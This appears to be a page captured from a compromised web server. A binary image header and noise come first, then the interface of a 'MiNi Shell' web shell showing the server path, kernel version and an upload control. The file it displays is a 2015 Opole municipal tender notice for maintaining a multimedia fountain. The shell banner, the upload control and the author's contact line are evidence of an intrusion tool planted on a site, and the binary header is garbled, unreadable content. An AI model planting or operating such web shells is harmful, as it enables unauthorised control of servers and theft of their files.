JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150203/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150203/23624-N-2015.html

<p class="kh_header"><b>Opole: Kompleksowa eksploatacja i konserwacja fontanny multimedialnej na terenie Stawu Zamkowego przy ul. Barlickiego w Opolu</b><br>
<b>Numer ogłoszenia: 23624 - 2015; data zamieszczenia: 03.02.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto  Opole , Rynek-Ratusz, 45-015 Opole, woj. opolskie, tel. 77 451 19 21, 77 451 19 22, faks 77 454 98 44.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.um.opole.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kompleksowa eksploatacja i konserwacja fontanny multimedialnej na terenie Stawu Zamkowego przy ul. Barlickiego w Opolu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> a)Przedmiotem zamówienia są usługi związane z eksploatacją i konserwacją fontanny multimedialnej przy ul. Barlickiego w Opolu. 
b)Opis techniczny fontanny:
Fontanna zasilana jest z własnego ujęcia wody o zasobach eksploatacyjnych 12 m3/h, zlokalizowanego na terenie Stawu Zamkowego. Woda tłoczona jest do systemu filtracyjnego w komorze technicznej A, w której zainstalowano filtry piaskowe wraz ze stacją pomp obiegowych, automatyczne urządzenie kontrolujące jakość wody ze stacjami dozującymi odczynniki chemiczne oraz sterowanie muzyczne fontanną. Woda w niecce fontanny jest filtrowana w zamkniętym układzie filtracyjnym opartym na skimmerach ściennych oraz dennych dyszach tłocznych. System ten pracuje niezależnie od obiegu zasilającego dysze fontanny. Zasilanie obrazu fontanny odbywa się oddzielnym układem opartym na ssakach dennych oraz dyszach fontannowych (33 szt.). Urządzenia sterowania obrazem fontanny zamontowane zostały w komorze technicznej B, w której zainstalowano szafy zasilająco-sterownicze kontrolujące pracę pomp fontannowych, reflektorów, dysz dynamicznych oraz system nagłośnienia. Opróżnianie fontanny odbywa się poza układem filtracyjnym i jest realizowane poprzez grawitacyjny spływ wody z dwóch spustów dennych zlokalizowanych w miejscowym przegłębieniu niecki.
c)Szczegółowy zakres prac do wykonania w ramach zamówienia:
-utrzymywanie w stałej gotowości technicznej urządzeń, a w szczególności: pomp, filtrów, urządzenia kontrolno-pomiarowego do kontroli i sterowania parametrami chemicznymi (pH, chlor), dysz wodnych i rurociągów fontanny, wentylacji w komorach technologicznych, urządzeń sterujących i zasilania elektrycznego, ssaków dennych, dysz wlotowych dennych i spustów wody z niecki fontanny,
-utrzymywanie w należytym stanie technicznym wszystkich urządzeń towarzyszących, między innymi: instalacji zasilania fontanny w wodę, skimmerów ściennych, instalacji kanalizacji deszczowej  i sanitarnej (popłuczyny z filtrów) wraz z przepływomierzem ścieków, przelewów awaryjnych, instalacji zasilania energetycznego i systemu nagłośnienia fontanny,
-dbanie o czystość niecki fontannowej (usuwanie zanieczyszczeń z powierzchni wody oraz z dna niecki), a w szczególności, skimmerów ściennych, dysz dennych i fontannowych, zaworów oraz koszy wstępnych i filtrów dokładnych pomp,
-utrzymywanie w należytym stanie technicznym studni do poboru wody oraz eksploatacji  ujęcia zgodnie z warunkami pozwolenia wodnoprawnego na pobór wód (w tym wykonywania wymaganych pozwoleniem pomiarów i analiz), 
-przygotowanie niecki do eksploatacji fontanny w sezonie letnim oraz przeprowadzenia wiosennego rozruchu instalacji fontanny, 
-kontrola i dozowanie środków chemicznych w zakresie utrzymania pH i chloru,
-przestrzeganie zachowania prawidłowych parametrów wody:
a)wartość pH powinna wynosić 6,5-7,2
b)zawartość wolnego chloru powinna utrzymywać się na poziomie 0,1-0,2 mg/l,
-zapewnienie we własnym zakresie wszystkich środków chemicznych niezbędnych do utrzymania parametrów wody na właściwym poziomie,
-zabezpieczenie urządzeń i wszystkich instalacji fontanny na okres zimowy,
-opróżnienie niecki przed sezonem zimowym w celu jej dokładnego wyczyszczenia, a następnie ponowne napełnienie niecki,
-sprzątanie powierzchni wody/lodu w niecce,
-montaż ławek na betonowych korytach zabezpieczających dysze w ramach przygotowania fontanny do sezonu zimowego oraz demontaż i złożenie elementów ławek w miejscu wskazanym przez Zamawiającego przed sezonem letnim,
-zapewnienie sprzętu, urządzeń i materiałów niezbędnych do eksploatacji i konserwacji fontanny oraz środków chemicznych do utrzymania komór technicznych w czystości, 
-zapewnienie personelu posiadającego odpowiednie kwalifikacje do obsługi urządzeń fontanny,
-prowadzenie odpowiednich wymaganych dokumentów m.in. książki eksploatacji obiektu, książki eksploatacji studni,
-prowadzenie pomiarów i przeglądów urządzeń elektrycznych, 
-przeprowadzenie jeden raz w okresie obowiązywania umowy - w terminie do 30.11.2015 r.- rocznej kontroli stanu technicznego obiektu, o której mowa w art. 62 ustawy Prawo budowlane, przez osoby posiadające stosowne uprawnienia,
-prowadzenie prac związanych z bieżącą eksploatacją zgodnie z przepisami BHP ze szczególnym zwróceniem uwagi na osoby zatrudnione przy środkach chemicznych dozowanych do układu technologicznego fontanny,
-informowanie na bieżąco Zamawiającego o zauważonych zmianach stanu technicznego i uszkodzeniach, zainstalowanych urządzeń technologicznych fontanny oraz konstrukcji komór technicznych i niecki wraz z ich odnotowywaniem w książce eksploatacyjnej obiektu w dniu zdarzenia,
-prowadzenie eksploatacji zgodnie z instrukcjami obsługi i eksploatacji, jak również instrukcjami obsługi urządzeń dostarczonymi przez producentów,
-współdziałanie z wykonawcą fontanny - firmą Techbud Sp. z o.o., ul. Kępska 6, 45-129 Opole - w czasie corocznych przeglądów gwarancyjnych,
-bieżąca eksploatacja, konserwacja i utrzymanie sprzętu nagłaśniającego i multimedialnego fontanny zgodnie z instrukcją obsługi systemu nagłośnienia oraz instrukcjami obsługi urządzeń wydanymi przez producentów poszczególnych elementów wchodzących w skład nagłośnienia i projekcji multimedialnej,
-obsługa i nadzorowanie codziennego trybu muzycznego fontanny,
-wprowadzanie zmian w harmonogramie pokazów muzycznych zgodnie z dyspozycjami Zamawiającego,
-opracowanie programów do nowych utworów muzycznych (wskazanych przez Zamawiającego do 31.03.2015 r.) wraz z wgraniem ich do sterownika w szafie zasilająco-sterującej i poprawkami wykonywanymi na działającej fontannie aż do czasu uzyskania akceptacji przez Zamawiającego w terminie do 30.06.2015 r.,
-informowanie o wszelkich powstałych uszkodzeniach i nieprawidłowościach systemów nagłośnienia i multimedialnego wykonawcy fontanny, który jest gwarantem wykonania fontanny. 
-udostępnianie obiektu i współdziałanie z organizatorami imprez kulturalno-rozrywkowych, organizowanych za zgodą Zamawiającego (przewiduje się ok. 5 imprez w czasie trwania umowy),
-przestrzeganie przepisów ustawy z dnia 14.12.2012 r. o odpadach (Dz.U. z 2013 r., poz. 21),
-przestrzeganie przepisów przeciwpożarowych i bhp,
-ponoszenie odpowiedzialności za szkody powstałe z winy Wykonawcy w trakcie wykonywania umowy,
-posiadanie przez cały okres realizacji przedmiotu umowy ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej odpowiadającej przedmiotowi zamówienia na wartość nie mniejszą niż 30 000 zł od jednego zdarzenia i 250 000 zł od wszystkich zdarzeń.


Termin realizacji zamówienia: od podpisania umowy, nie wcześniej niż od 01.03.2015 r. do 31.05.2016 r..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenia zamówień uzupełniających do wysokości 20 % , o których mowa w art. 67 ust. 1 pkt.6 Prawa  polegające na powtórzeniu tego samego rodzaju zamówień.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 50.00.00.00-5, 90.91.31.00-1, 79.95.21.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia warunku posiadania wiedzy i doświadczenia do wykonania zamówienia Zamawiający żąda złożenia oświadczenia w formie wykazu usług wykonanych/wykonywanych  w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane w oraz załączenia dowodów czy zostały wykonane lub są wykonywane należycie. 

Dowodami, o których mowa powyżej są: 
a. poświadczenie, z tym, że w odniesieniu do nadal wykonywanych usług poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert, 

b. oświadczenie Wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa w pkt a.
W przypadku gdy Zamawiający jest podmiotem, na rzecz którego usługi wskazane w wykazie zostały wcześniej wykonane/wykonywane, Wykonawca nie ma obowiązku przedkładania dowodów, o których mowa powyżej.

Warunek zostanie uznany za spełniony jeżeli Wykonawca wykaże się wykonaniem/wykonywaniem: 
-	co najmniej 1 usługi polegającej na rocznej eksploatacji stałej fontanny multimedialnej, wyposażonej w dysze wodne, światła ledowe, nagłośnienie oraz system uzdatniania wody; 
-	uruchomienia co najmniej 1 fontanny o podobnym charakterze, wyposażonej w dysze wodne, światła ledowe, nagłośnienie oraz system uzdatniania wody (układ filtracyjny, kontroler SUW ze zdalnym układem samodiagnostyki pH/Cl);
-	opracowania co najmniej 1 pokazu muzycznego dla fontanny o podobnym charakterze (dysze wodne, światła ledowe, nagłośnienie). 
Wymienione usługi  mogą być wykazane jako wykonane/wykonywane oddzielnie lub łącznie w jednym zadaniu.

Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączącego go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia (art. 26 ust.2b Prawa).

 W przypadku wykazania doświadczenia, które udostępni inny podmiot, Wykonawca do wykazu załącza pisemne zobowiązanie do udostępnienia tego doświadczenia wystawione przez podmiot udostępniający. Zobowiązanie winno być złożone w oryginale.

Zobowiązanie winno zawierać:
- nazwę podmiotu udostepniającego,
- nazwę podmiotu przyjmującego,
- okres jakiego dotyczy (czas) udostępnienie,
- zakres dostępnych Wykonawcy zasobów innego podmiotu (np. doświadczenie, osoby, sprzęt),
- zakres udziału innego podmiotu (np. jaki zakres zamówienia, jaka część zamówienia, jaki rodzaj usług)
- sposób wykorzystania zasobów innego podmiotu przez Wykonawcę ( np. konsultacja, analiza, szkolenia, doradztwo, czynny udział - podwykonawstwo, oddelegowanie osób), 
- charakter stosunku Wykonawcy z podmiotem udostępniającym (np. umowa cywilnoprawna, umowa o pracę).

Wzór wykazu załączono do specyfikacji istotnych warunków zamówienia.

Dokonanie oceny spełnienia warunków udziału w postępowaniu odbywać się będzie na podstawie złożonych w ofercie Wykonawcy oświadczeń i dokumentów. Zamawiający sprawdzi kompletność dokumentów, a następnie dokona sprawdzenia spełnienia warunków według zasady spełnia/nie spełnia, co musi wynikać jednoznacznie z treści oświadczeń i dokumentów.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia dysponowania osobami zdolnymi do wykonania zamówienia Zamawiający żąda złożenia oświadczenia o posiadaniu wymaganych uprawnień przez osoby, które będą uczestniczyć  w wykonywaniu zamówienia. 

Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże co najmniej 1 osobę, posiadającą aktualne świadectwo kwalifikacyjne kat. E - uprawniające do eksploatacji urządzeń, instalacji i sieci elektrycznych o napięciu do 1 kV.

Wykonawca składający ofertę zobowiązuje się w przypadku podpisania umowy, do skierowania do pracy osoby wskazanej w oświadczeniu. W przypadkach losowych wykluczających zatrudnienie osoby wskazanej w oświadczeniu, Wykonawca będzie zobowiązany do zatrudnienia innej osoby posiadającej wymagane uprawnienia. 

Wzór wykazu załączono do siwz.



Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączącego go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia (art. 26 ust.2b Prawa).
Dokonanie oceny spełnienia warunków udziału w postępowaniu odbywać się będzie na podstawie złożonych w ofercie Wykonawcy oświadczeń i dokumentów. Zamawiający sprawdzi kompletność dokumentów, a następnie dokona sprawdzenia spełnienia warunków według zasady spełnia/nie spełnia, co musi wynikać jednoznacznie z treści oświadczeń i dokumentów.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - dodatkowe programy - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający przewiduje możliwość dokonania istotnych zmian postanowień zawartej umowy, jeżeli konieczność wprowadzenia zmian wynikać będzie z regulacji prawnych wprowadzonych w życie po dacie podpisania umowy, wywołujących potrzebę zmian umowy, wraz ze skutkami wprowadzenia takich zmian lub w przypadku okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, przy czym zmiany postanowień umowy dotyczyć mogą:
a)Terminu realizacji przedmiotu zamówienia wraz ze skutkami wprowadzenia takiej zmiany, 
b)Sposobu wykonywania przedmiotu umowy wraz ze skutkami wprowadzenia takiej zmiany, 
c)Oznaczenia danych dotyczących Zamawiającego i/lub Wykonawcy.
d)Zmiany wynagrodzenia w przypadku:
zmiany stawki podatku od towaru i usług,
zmiany wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art.2 ust.3-5 ustawy z dnia 10.10.2002 r. o minimalnym wynagrodzeniu za pracę,
zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub zmiany  wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne. 
2.Wprowadzenie zmiany postanowień umowy wymaga aneksu sporządzonego w formie pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.um.opole.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Opola Wydział Inwestycji Miejskich - pok. 118 pl. Wolności 7-8 45 - 018 Opole.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.02.2015 godzina 11:00, miejsce: Urząd Miasta Opola Wydział Inwestycji Miejskich - pok. 117 B pl. Wolności 7-8 45 - 018 Opole.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com